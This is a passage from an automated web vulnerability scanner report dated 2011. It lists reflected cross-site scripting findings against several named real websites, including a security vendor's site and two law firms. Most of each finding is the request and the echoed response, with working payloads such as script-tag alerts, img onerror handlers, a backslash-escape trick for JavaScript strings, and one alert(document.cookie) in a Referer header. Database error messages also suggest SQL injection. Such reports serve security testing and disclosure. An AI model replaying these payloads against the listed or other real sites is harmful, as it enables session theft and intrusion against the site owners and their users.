User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sunday 15-May-1994 12:00:00 GMT
Date: Sun, 17 Apr 2011 13:55:01 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=172837142;expires=Tue, 09-Apr-2041 13:55:02 GMT;path=/
Set-Cookie: CFTOKEN=71173826;expires=Tue, 09-Apr-2041 13:55:02 GMT;path=/
Set-Cookie: JSESSIONID=843026b25bd8e385f77c781a33293677206c;path=/
Content-Length: 2684


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- *** P
...[SNIP]...
<form action="/add/index.cfm?6bfaa"><script>alert(1)</script>8d9f2554263=1" method="post" name="l" id="l">
...[SNIP]...
4.153. http://www.kaboodle.com/grab/addItemWithUrl [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kaboodle.com
Path:   /grab/addItemWithUrl

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2413"><a>4930429a96f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grabf2413"><a>4930429a96f/addItemWithUrl HTTP/1.1
Host: www.kaboodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tB%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; Expires=Tue, 16-Apr-2013 14:14:11 GMT; Path=/
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=%7B%22mv%22%3A%22268%22%7D; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 17 Apr 2011 14:14:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="canonical" href="http://www.kaboodle.com/grabf2413"><a>4930429a96f/addItemWithUrl.html" />
...[SNIP]...
4.154. http://www.kaboodle.com/grab/addItemWithUrl [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kaboodle.com
Path:   /grab/addItemWithUrl

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f220"><a>389513feb5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grab/addItemWithUrl3f220"><a>389513feb5b HTTP/1.1
Host: www.kaboodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tB%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; Expires=Tue, 16-Apr-2013 14:14:23 GMT; Path=/
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=%7B%22mv%22%3A%22526%22%7D; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 17 Apr 2011 14:14:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="canonical" href="http://www.kaboodle.com/grab/addItemWithUrl3f220"><a>389513feb5b.html" />
...[SNIP]...
4.155. http://www.kaboodle.com/grab/addItemWithUrl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaboodle.com
Path:   /grab/addItemWithUrl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5f9f"><script>alert(1)</script>e350adcdd3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /grab/addItemWithUrl?a5f9f"><script>alert(1)</script>e350adcdd3f=1 HTTP/1.1
Host: www.kaboodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tB%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; Expires=Tue, 16-Apr-2013 14:14:11 GMT; Path=/
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=%7B%22mv%22%3A%22267%22%7D; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 3118
Date: Sun, 17 Apr 2011 14:14:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>


            <link r
...[SNIP]...
<input type="hidden" name="a5f9f"><script>alert(1)</script>e350adcdd3f" value="1"/>
...[SNIP]...
4.156. http://www.kaboodle.com/za/additem [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kaboodle.com
Path:   /za/additem

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea03"><a>2463a037575 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /zaaea03"><a>2463a037575/additem?a5f9f= HTTP/1.1
Host: www.kaboodle.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/grab/addItemWithUrl?a5f9f%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee350adcdd3f=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ss=""; pp=%00tA%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; sd=%7B%22mv%22%3A%22654%22%2C%22mv_s%22%3A%221%22%7D; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26D57BF7851D2609-60000130002CA7D2[CE]

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:24:24 GMT
Content-Length: 70270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="canonical" href="http://www.kaboodle.com/zaaea03"><a>2463a037575/additem.html" />
...[SNIP]...
4.157. http://www.kirtsy.com/submit.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kirtsy.com
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc309"><img%20src%3da%20onerror%3dalert(1)>f2948ed7988 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc309\"><img src=a onerror=alert(1)>f2948ed7988 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submit.php?fc309"><img%20src%3da%20onerror%3dalert(1)>f2948ed7988=1 HTTP/1.1
Host: www.kirtsy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:12 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 20799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" name="return" value="/submit.php?fc309\"><img src=a onerror=alert(1)>f2948ed7988=1"/>
...[SNIP]...
4.158. http://www.mister-wong.com/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mister-wong.com
Path:   /index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f462"><img%20src%3da%20onerror%3dalert(1)>7a35b20e713 was submitted in the REST URL parameter 1. This input was echoed as 4f462"><img src=a onerror=alert(1)>7a35b20e713 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index.php4f462"><img%20src%3da%20onerror%3dalert(1)>7a35b20e713 HTTP/1.1
Host: www.mister-wong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 17 Apr 2011 14:14:46 GMT
Server: Apache
Set-Cookie: wongsess=178585a74b2117df7bb2ef56a6ca693c; expires=Wed, 16 Apr 2036 20:14:46 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding
Content-Length: 5168
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<div id="main" class="c_index.php4f462"><img src=a onerror=alert(1)>7a35b20e713">
...[SNIP]...
4.159. http://www.morrisonmahoney.com/location.asp [loid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.morrisonmahoney.com
Path:   /location.asp

Issue detail

The value of the loid request parameter is copied into the HTML document as plain text between tags. The payload 99921<script>alert(1)</script>08f8719032 was submitted in the loid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /location.asp?loid=499921<script>alert(1)</script>08f8719032 HTTP/1.1
Host: www.morrisonmahoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRSQQS=KJDHBHJAGEAKKPLCPGMMOFLP; visit=0;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 16 Apr 2011 14:36:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1526
Content-Type: text/html
Cache-control: private


<html>
<head>


<SCRIPT language="javascript">
function RI(images,iparams)
{
/* si: start index
** i: current index
** ei: end index
** cc: current count
*/
si = 0;
ci=0;
cc=0;

...[SNIP]...
<td>[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'location_id = 499921<script>alert(1)</script>08f8719032'.</td>
...[SNIP]...
4.160. http://www.morrisonmahoney.com/locations.asp [stid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.morrisonmahoney.com
Path:   /locations.asp

Issue detail

The value of the stid request parameter is copied into the HTML document as plain text between tags. The payload 5f04c<script>alert(1)</script>d8c433e5d2 was submitted in the stid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /locations.asp?stid=35f04c<script>alert(1)</script>d8c433e5d2 HTTP/1.1
Host: www.morrisonmahoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRSQQS=KJDHBHJAGEAKKPLCPGMMOFLP; visit=0;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 16 Apr 2011 14:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1524
Content-Type: text/html
Cache-control: private


<html>
<head>


<SCRIPT language="javascript">
function RI(images,iparams)
{
/* si: start index
** i: current index
** ei: end index
** cc: current count
*/
si = 0;
ci=0;
cc=0;

...[SNIP]...
<td>[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'state_id=35f04c<script>alert(1)</script>d8c433e5d2'.</td>
...[SNIP]...
4.161. http://www.morrisonmahoney.com/newsrelease.asp [nrid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.morrisonmahoney.com
Path:   /newsrelease.asp

Issue detail

The value of the nrid request parameter is copied into the HTML document as plain text between tags. The payload ec521<script>alert(1)</script>6edfa1b3e51 was submitted in the nrid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsrelease.asp?nrid=534ec521<script>alert(1)</script>6edfa1b3e51 HTTP/1.1
Host: www.morrisonmahoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRSQQS=KJDHBHJAGEAKKPLCPGMMOFLP; visit=0;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 16 Apr 2011 14:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1534
Content-Type: text/html
Cache-control: private


<html>
<head>


<SCRIPT language="javascript">
function RI(images,iparams)
{
/* si: start index
** i: current index
** ei: end index
** cc: current count
*/
si = 0;
ci=0;
cc=0;

...[SNIP]...
<td>[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'news_id = 534ec521<script>alert(1)</script>6edfa1b3e51'.</td>
...[SNIP]...
4.162. http://www.mylinkvault.com/link-page.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mylinkvault.com
Path:   /link-page.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fe9b"><script>alert(1)</script>0aa220655c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /link-page.php?1fe9b"><script>alert(1)</script>0aa220655c2=1 HTTP/1.1
Host: www.mylinkvault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Set-Cookie: PHPSESSID=vp85qklqj15vc4a1q0jtqd3le4; path=/; domain=.mylinkvault.com
Vary: Accept-Encoding
Content-Length: 4249
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE php PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<tit
...[SNIP]...
<input type="hidden" name="login_referer" value="/link-page.php?1fe9b"><script>alert(1)</script>0aa220655c2=1" />
...[SNIP]...
4.163. http://www.pandasecurity.com/activescan/requirements/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pandasecurity.com
Path:   /activescan/requirements/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0b93"><script>alert(1)</script>9f112544824 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /activescan/requirements/?error=chrome&track=1&Lang=en-US&IdPais=63&b0b93"><script>alert(1)</script>9f112544824=1 HTTP/1.1
Host: www.pandasecurity.com
Proxy-Connection: keep-alive
Referer: http://www.pandasecurity.com/activescan/index/?track=1&Lang=en-US&IdPais=63
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=en-US; AlteonP=3e4506e059006be3; ASP.NET_SessionId=nwhv35nnylyjcxamklrn3y55; Track=1; __utmz=216749847.1303044902.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=216749847.633268075.1303044902.1303044902.1303044902.1; __utmc=216749847; __utmb=216749847.2.10.1303044902

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Refresh: 28790
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sun, 17 Apr 2011 13:00:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 17 Apr 2011 13:00:18 GMT
Connection: close
Set-Cookie: Language=en-US; expires=Tue, 17-Apr-2012 13:00:01 GMT; path=/activescan
Content-Length: 21102


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
   <head>
       <link type="image/x-icon" href="/activescan/images/favicon.ico" rel="shortcut ico
...[SNIP]...
<a href="http://www.pandasecurity.com/activescan/requirements/?lang=de-DE&error=chrome&track=1&IdPais=63&b0b93"><script>alert(1)</script>9f112544824=1">
...[SNIP]...
4.164. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B0%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B0%5D request parameter is copied into the HTML document as plain text between tags. The payload 765fc<script>alert(1)</script>6ee45e5a499 was submitted in the FE%5Bfe_users%5D%5B0%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E765fc<script>alert(1)</script>6ee45e5a499&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:03 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27275

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
</script>765fc<script>alert(1)</script>6ee45e5a499');
   updateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users]
...[SNIP]...
4.165. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B0%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B0%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13d35\'%3balert(1)//8e6a0f23626 was submitted in the FE%5Bfe_users%5D%5B0%5D parameter. This input was echoed as 13d35\\';alert(1)//8e6a0f23626 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=13d35\'%3balert(1)//8e6a0f23626&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:20:47 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27209

<!DOCTYPE html
